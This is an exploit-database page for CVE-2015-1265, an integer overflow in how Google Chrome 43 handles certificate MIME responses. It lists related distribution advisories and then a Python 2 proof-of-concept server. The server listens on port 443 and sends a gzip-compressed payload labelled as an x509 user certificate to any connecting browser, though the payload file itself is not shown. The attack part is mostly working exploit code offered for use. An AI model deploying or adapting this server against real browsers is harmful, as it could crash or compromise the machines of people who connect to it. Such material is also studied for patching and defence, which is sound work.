Google Chrome 43.0 - Certificate MIME Handling Integer Overflow Exploit

🗓️ 15 Aug 2015 00:00:00Reported by Paulos YibeloType

zdt🔗 0day.today👁 38 Views

Google Chrome 43.0 Certificate MIME Handling Integer Overflow Exploi

Reporter	Title	Published	Views	Family All 48
FreeBSD	chromium -- multiple vulnerabilities	19 May 201500:00	–	freebsd
ArchLinux	chromium: multiple issues	21 May 201500:00	–	archlinux
BDU FSTEC	The vulnerability of the CertificateResourceHandler function, which processes MIME certificates, allows a hacker to trigger a service failure or execute arbitrary code.	7 Oct 202000:00	–	bdu_fstec
CNVD	Google Chrome Denial of Service Vulnerability (CNVD-2015-03372)	21 May 201500:00	–	cnvd
CVE	CVE-2015-1265	20 May 201510:00	–	cve
Cvelist	CVE-2015-1265	20 May 201510:00	–	cvelist
Debian	[SECURITY] [DSA 3267-1] chromium-browser security update	22 May 201505:02	–	debian
Debian	[SECURITY] [DSA 3267-1] chromium-browser security update	22 May 201505:02	–	debian
Debian CVE	CVE-2015-1265	20 May 201510:00	–	debiancve
Tenable Nessus	Debian DSA-3267-1 : chromium-browser - security update	26 May 201500:00	–	nessus

#! /usr/bin/python2
 
import socket
import sys
import time
 
kHost = '127.0.0.1'
kPort = 443
 
def bind_listen():
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
  s.bind((kHost, kPort))
  s.listen(1)
  return s
 
def send_certificate(c, r):
  print '[*] sending certificate'
  payload = ''
  with open('compressed', 'rb') as tmp:
    payload = tmp.read()
  c.send('HTTP/1.1 200 OK\r\n')
  c.send('Content-Type: application/x-x509-user-cert\r\n')
  c.send('Content-Encoding: gzip\r\n')
  c.send('Content-Length: {}\r\n'.format(len(payload)))
  c.send('\r\n')
  c.send(payload)
 
def main():
  print '[*] listening for connection on port {}:{}'.format(kHost, kPort)
  s = bind_listen()
  while True:
    c, (host, port) = s.accept()
    print '[*] connection from {}:{}'.format(host, port)
    while True:
      r = c.recv(1024)
      if 'favicon' in r:
        c.send('HTTP/1.1 404 Not Found\r\n\r\n')
      else:
        send_certificate(c, r)
        time.sleep(20)
        sys.exit(0)
 
if __name__ == '__main__':
  main()
 
Thanks,
Paulos Yibelo

#  0day.today [2018-03-05]  #

15 Aug 2015 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.09937